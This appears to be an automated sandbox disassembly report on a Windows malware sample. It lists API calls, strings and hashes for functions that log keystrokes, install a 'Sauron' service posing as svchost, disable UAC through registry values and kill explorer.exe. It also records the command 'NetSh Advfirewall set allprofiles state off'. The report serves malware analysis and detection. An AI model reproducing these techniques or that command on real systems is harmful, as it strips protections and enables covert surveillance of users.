closesocket, xrefs: 1000F12F
MoveFileA, xrefs: 1000EE98
CreateEventA, xrefs: 1000EDA8
ADVAPI32.dll, xrefs: 1000F1D1
CreateProcessAsUserA, xrefs: 1000F35C
GetTickCount, xrefs: 1000ED60
SetServiceStatus, xrefs: 1000F1E2
SetEvent, xrefs: 1000EDF0

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
API String ID: 2238633743-2593546367
Opcode ID: e4a78107f26e1aab13bca31db4cc7d57e899abdf5c66ab562613916c86fc312d
Instruction ID: 66515d4dbca09a80bd5dc83e6cef3902a128c85a85fa8b75b56725ed83415fb5
Opcode Fuzzy Hash: e4a78107f26e1aab13bca31db4cc7d57e899abdf5c66ab562613916c86fc312d
Instruction Fuzzy Hash: 24328478A01104EFDB04DFA0CA88DAEB7B5FB48205B3496A9ED059B311D731EE86DF54

Function 1000B825 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 184serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000,10013050,10027510,000000FF,?,1000B7D4,Sauron,Sauron Jklmnopq Stuvwxya Cdef,Sauronij Lmnopqrst Vwxyabc Efghijkl Nop), ref: 1000B859
wsprintfA.USER32 ref: 1000B913
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 1000B94A
CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 1000B992
LockServiceDatabase.ADVAPI32(00000000), ref: 1000B9A5
ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 1000B9CB
ChangeServiceConfig2A.ADVAPI32(00000000,00000002,00015180), ref: 1000BA75
UnlockServiceDatabase.ADVAPI32(?), ref: 1000BA82
GetLastError.KERNEL32 ref: 1000BA91
OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 1000BAAE

Strings

C:\Windows\svchost.exe, xrefs: 1000B900, 1000B906
SYSTEM\CurrentControlSet\Services\, xrefs: 1000BAF0
Sauron, xrefs: 1000B9B1
Description, xrefs: 1000BB43

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Service$ChangeConfig2DatabaseOpen$CreateErrorFileLastLockManagerModuleNameUnlockwsprintf
String ID: C:\Windows\svchost.exe$Description$SYSTEM\CurrentControlSet\Services\$Sauron
API String ID: 3582897023-1344864867
Opcode ID: 7c0a205152b565cac16c6155952ced6ef65c0fcdb4695fcebb4b3b8c2ea87258
Instruction ID: be0bf87da2a9e90805305669f97c9818aa463ff04f2e3da552491ff6e1d5d4cf
Opcode Fuzzy Hash: 7c0a205152b565cac16c6155952ced6ef65c0fcdb4695fcebb4b3b8c2ea87258
Instruction Fuzzy Hash: 26910E71904368EBEB21CF54CC89BDDBBB8BB09704F1041D8E60C6A281C7B95B88CF65

Function 1000C9D1 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 221keyboardsynchronizationsleepCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 1000C9E4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000C9F9
Sleep.KERNEL32(0000000A), ref: 1000CA70
lstrlenA.KERNEL32(00000000), ref: 1000CA7D
GetKeyState.USER32(00000010), ref: 1000CB13
GetAsyncKeyState.USER32(?), ref: 1000CB3C
GetKeyState.USER32(00000014), ref: 1000CB55

Strings

<BackSpace>, xrefs: 1000CC40
e, xrefs: 1000CB04
KeyLogger, xrefs: 1000C9DB
], xrefs: 1000CBB1
<Enter>, xrefs: 1000CCC3

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
String ID: <BackSpace>$<Enter>$KeyLogger$]$e
API String ID: 2104880762-711950257
Opcode ID: 82160d3011cf726be762b6710d746de6e1170b02bd3e1df9bb76e956fc2322e5
Instruction ID: 25658be5e0e0d185bba599a095a63414cfb52cbb4c87acf105870197e9b7d057
Opcode Fuzzy Hash: 82160d3011cf726be762b6710d746de6e1170b02bd3e1df9bb76e956fc2322e5
Instruction Fuzzy Hash: F891CFB590031C9BFB20CB60CC85FDA73B5FB45354F1082B9EB09A6184D7B59AC5CE56

Function 10003D1A Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 221keyboardsynchronizationsleepCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 10003D2D
WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003D42
Sleep.KERNEL32(0000000A), ref: 10003DB9
lstrlenA.KERNEL32(00000000), ref: 10003DC6
GetKeyState.USER32(00000010), ref: 10003E5C
GetAsyncKeyState.USER32(?), ref: 10003E85
GetKeyState.USER32(00000014), ref: 10003E9E

Strings

<Enter>, xrefs: 1000400C
<BackSpace>, xrefs: 10003F89
e, xrefs: 10003E4D
], xrefs: 10003EFA
KeyLogger, xrefs: 10003D24

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
String ID: <BackSpace>$<Enter>$KeyLogger$]$e
API String ID: 2104880762-711950257
Opcode ID: e1755033cff4e96edff72218af48e9341045b928f7917f6eae709996ef5eec1d
Instruction ID: 34bd150bfbcfea4838e3dd306dbc08b28c1abe35d4e389b46f9360e62058610b
Opcode Fuzzy Hash: e1755033cff4e96edff72218af48e9341045b928f7917f6eae709996ef5eec1d
Instruction Fuzzy Hash: 8F9105F5900219DBFB20CB50CC44BEA73B9FB80354F1086A9EB09A2184DB729AD5CF56

Function 10008578 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 111libraryloaderprocessCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 10008583
GetProcAddress.KERNEL32(?,CreateEnvironmentBlock), ref: 10008595
GetCurrentProcess.KERNEL32 ref: 10008604
OpenProcessToken.ADVAPI32(?,000F01FF,00000000), ref: 1000861A
DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000001,00000001,00000000), ref: 10008633
LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 10008643
GetProcAddress.KERNEL32(00000000), ref: 1000864A
SetTokenInformation.ADVAPI32(00000000,0000000C,00000000,00000004), ref: 1000866B
CreateProcessAsUserA.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000430,00000000,00000000,00000044,00000000), ref: 100086A1
CloseHandle.KERNEL32(00000000), ref: 100086B1
CloseHandle.KERNEL32(00000000), ref: 100086BB
FreeLibrary.KERNEL32(00000000), ref: 100086DA

Strings

userenv.dll, xrefs: 1000857E
D, xrefs: 100085F6
Kernel32.dll, xrefs: 1000863E
CreateEnvironmentBlock, xrefs: 1000858C
WTSGetActiveConsoleSessionId, xrefs: 10008639

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser
String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$userenv.dll
API String ID: 1797627335-609967149
Opcode ID: 25d5a992ae9875f917fb28de0db4a8f6c06f03dadb4b22379c40c07642fe5b6f
Instruction ID: 6c1f6e9c6c68b720c4822e3bc91b10347c6cc792b02aebbdf7ab63c842c88167
Opcode Fuzzy Hash: 25d5a992ae9875f917fb28de0db4a8f6c06f03dadb4b22379c40c07642fe5b6f
Instruction Fuzzy Hash: DE41B0B5D00218ABEB10DFE0CC89BEEBB78FB48704F204119F605AB284D7B56949CF55

Function 10008D6B Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 58registryprocessCOMMON

Download Yara Rule

APIs

WinExec.KERNEL32(NetSh Advfirewall set allprofiles state off,00000000), ref: 10008D78

Part of subcall function 10002210: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 10002227
Part of subcall function 10002210: GetProcAddress.KERNEL32(00000000), ref: 1000222E
Part of subcall function 10002210: GetCurrentProcess.KERNEL32(00000000), ref: 10002241

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000200,00000000), ref: 10008DC6
RegSetValueExA.ADVAPI32(00000000,ConsentPromptBehaviorAdmin,00000000,00000004,00000000,00000004), ref: 10008DDF
RegSetValueExA.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 10008DF8
RegSetValueExA.ADVAPI32(00000000,PromptOnSecureDesktop,00000000,00000004,00000000,00000004), ref: 10008E11
RegCloseKey.ADVAPI32(00000000), ref: 10008E1B

Strings

EnableLUA, xrefs: 10008DEF
NetSh Advfirewall set allprofiles state off, xrefs: 10008D73
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 10008DBC
ConsentPromptBehaviorAdmin, xrefs: 10008DD6
PromptOnSecureDesktop, xrefs: 10008E08

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Value$AddressCloseCurrentExecHandleModuleOpenProcProcess
String ID: ConsentPromptBehaviorAdmin$EnableLUA$NetSh Advfirewall set allprofiles state off$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 948431279-2903278940
Opcode ID: 5752f5c9a5ab6df8f4ddd1de26a04d7235e0221ef750bb0ec35a4b5f8f7c1f0d
Instruction ID: c8b83d3962fd9e7b0a949febc61f34bc161f42b36962fecb3bcebf140fc107f3
Opcode Fuzzy Hash: 5752f5c9a5ab6df8f4ddd1de26a04d7235e0221ef750bb0ec35a4b5f8f7c1f0d
Instruction Fuzzy Hash: C111C8B5A40208FBF710DBD0CD9AFAE7B78EB44705F204598F705AA1C0D7B46A098B59

Function 10004DFC Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 61processCOMMON

Download Yara Rule

APIs

Part of subcall function 10010D86: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 10010D95
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,OpenProcessToken), ref: 10010DA7
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 10010DB9
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 10010DCB
Part of subcall function 10010D86: LoadLibraryA.KERNEL32(kernel32.dll), ref: 10010DD9
Part of subcall function 10010D86: GetProcAddress.KERNEL32(?,GetCurrentProcess), ref: 10010DEB

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004E20
Process32First.KERNEL32(00000000,00000128), ref: 10004E4C
OpenProcess.KERNEL32(00000001,00000000,?,00000002,00000000), ref: 10004E74
TerminateProcess.KERNEL32(00000000,00000000), ref: 10004E92
Process32Next.KERNEL32(00000000,00000128), ref: 10004EA3
CloseHandle.KERNEL32(00000000,00000000,00000128,00000002,00000000), ref: 10004EB0

Strings

SeDebugPrivilege, xrefs: 10004E08
explorer.exe, xrefs: 10004E51
SeDebugPrivilege, xrefs: 10004EB8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32
String ID: SeDebugPrivilege$SeDebugPrivilege$explorer.exe
API String ID: 2427153066-1519388501
Opcode ID: 48a5bd9aeb436800186d6b4e851ad227f412b574337627ab9fcc6aaece346aef
Instruction ID: f265361390fd1f2fd6712c7dd9399b7c3d566face82f4e4f838ad1a3d6b32979
Opcode Fuzzy Hash: 48a5bd9aeb436800186d6b4e851ad227f412b574337627ab9fcc6aaece346aef
Instruction Fuzzy Hash: 25118975910218ABEB20DBB0DC45FDEB3B8EB49700F104494F608A6180DB70EB94CB95

Function 10002252 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 10002210: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 10002227
Part of subcall function 10002210: GetProcAddress.KERNEL32(00000000), ref: 1000222E
Part of subcall function 10002210: GetCurrentProcess.KERNEL32(00000000), ref: 10002241

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000200,00000000), ref: 100022A0
RegSetValueExA.ADVAPI32(00000000,ConsentPromptBehaviorAdmin,00000000,00000004,00000000,00000004), ref: 100022B9
RegSetValueExA.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 100022D2
RegSetValueExA.ADVAPI32(00000000,PromptOnSecureDesktop,00000000,00000004,00000000,00000004), ref: 100022EB
RegCloseKey.ADVAPI32(00000000), ref: 100022F5

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 10002296
ConsentPromptBehaviorAdmin, xrefs: 100022B0
EnableLUA, xrefs: 100022C9
PromptOnSecureDesktop, xrefs: 100022E2

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Value$AddressCloseCurrentHandleModuleOpenProcProcess
String ID: ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 3934731877-3549642244
Opcode ID: 100fffc2317faa458b0a55f71e06457176a5d02d141a08a688e9a0eebf648cfe
Instruction ID: f2c8f02b55084893b19ca0913038048ff2d2553d5254a0e7a7698056a4e02e10
Opcode Fuzzy Hash: 100fffc2317faa458b0a55f71e06457176a5d02d141a08a688e9a0eebf648cfe
Instruction Fuzzy Hash: 6F11E8B5A40208FBFB10DBD0CC9AFADBB78FB44744F604588F705AA1D0D7B86A088B55

Function 036010A0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

RpcStringBindingComposeW.RPCRT4(03618850,ncacn_np,localhost,0361889C,00000000,?), ref: 036010DB
RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 036010E9
RpcBindingSetAuthInfoExA.RPCRT4(?,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0360111D
RpcStringFreeW.RPCRT4(?), ref: 03601127

Strings

localhost, xrefs: 036010CB
ncacn_np, xrefs: 036010D0
i}v, xrefs: 036010E9

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: Binding$String$AuthComposeFreeFromInfo
String ID: localhost$ncacn_np$i}v
API String ID: 1126441048-2003718969
Opcode ID: a485b0030c926a9dea0edd002d057412a277aab39a1e5f6a1b2812626304d2ec
Instruction ID: f41810513663e44160fac3228b4e32ffcd49a839b8af64a9509ad9a68ae61493
Opcode Fuzzy Hash: a485b0030c926a9dea0edd002d057412a277aab39a1e5f6a1b2812626304d2ec
Instruction Fuzzy Hash: 9E1121B5E00309AFDB44DFA4C856BEFBBB5FB08700F108519E516A7284D7B55605CBA0

Function 100040C1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160
DeleteFileA.KERNEL32(00000000), ref: 10004271
FindNextFileA.KERNEL32(000000FF,?), ref: 10004291
FindClose.KERNEL32(000000FF), ref: 100042A3
RemoveDirectoryA.KERNEL32(?), ref: 100042AD

Strings

*.*, xrefs: 10004126

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDeleteDirectoryFirstNextRemove
String ID: *.*
API String ID: 196174304-438819550
Opcode ID: 7454fd9a23eda69077732fae33b3865e23428a7f1977ae6ca901062a967bb25b
Instruction ID: 544332dd4c4f1a6e3de284be9613cf86a43b06a9dce37034037e59df041ba050
Opcode Fuzzy Hash: 7454fd9a23eda69077732fae33b3865e23428a7f1977ae6ca901062a967bb25b
Instruction Fuzzy Hash: 3A517BB5D04268DBEB15CB60CC85BEEB779EF09344F5041D8E509A3285EB346B88CF61

Function 004310CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00431346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043135B
UnhandledExceptionFilter.KERNEL32(0043816C), ref: 00431366
GetCurrentProcess.KERNEL32(C0000409), ref: 00431382
TerminateProcess.KERNEL32(00000000), ref: 00431389

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c172f6f61f7116605a472aa03674f540fb06f97799fba0ba8e35fda6186ae64d
Instruction ID: b6429bcdfaaf8e98371ae801556f925c8add95895ed14ec5f50304f25c66bc77
Opcode Fuzzy Hash: c172f6f61f7116605a472aa03674f540fb06f97799fba0ba8e35fda6186ae64d
Instruction Fuzzy Hash: FA21EFB44803049FD714DF25FD486487BB2BB18316F50703AE58887A70DBB859A8CF4E

Function 02DF7080 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b21c219d30737b02995b3a9ccd85ebe6fcfa5efb58be70ebe406af4b56fcf49
Instruction ID: 2941d062be5c299a96209e7ee0cf66e027dede0f1ddeee6727f9f85fafaa9ff8
Opcode Fuzzy Hash: 8b21c219d30737b02995b3a9ccd85ebe6fcfa5efb58be70ebe406af4b56fcf49
Instruction Fuzzy Hash: 7F022A71E012199BEB54CFA8D880AEEFBF1FF48314F258269DA19A7340D731AD45CB94

Function 035AB8F0 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee06d42248281933825116b4fe5438a37e0448832e9e43b71068a1f031a195ed
Instruction ID: 1d44841371ac852386c2bd660649fe1df19ea713a5df5c6bf56e98f848106982
Opcode Fuzzy Hash: ee06d42248281933825116b4fe5438a37e0448832e9e43b71068a1f031a195ed
Instruction Fuzzy Hash: A0025D71E006199BDF14CFACD890AAEFBF5FF48314F298269D915AB350D731AA01DB90

Function 0360B8F0 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee06d42248281933825116b4fe5438a37e0448832e9e43b71068a1f031a195ed
Instruction ID: 50e9a459274cc08463eeb23aa987a38de831bee1c4f10d38622a56e2461c5926
Opcode Fuzzy Hash: ee06d42248281933825116b4fe5438a37e0448832e9e43b71068a1f031a195ed
Instruction Fuzzy Hash: DB024D71E002199BDF18CFA9C9816AEFBF5FF49314F288269D519EB380D731A941CB94

Function 035A1B13 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 035A1B1F
IsDebuggerPresent.KERNEL32 ref: 035A1BEB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035A1C04
UnhandledExceptionFilter.KERNEL32(?), ref: 035A1C0E

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

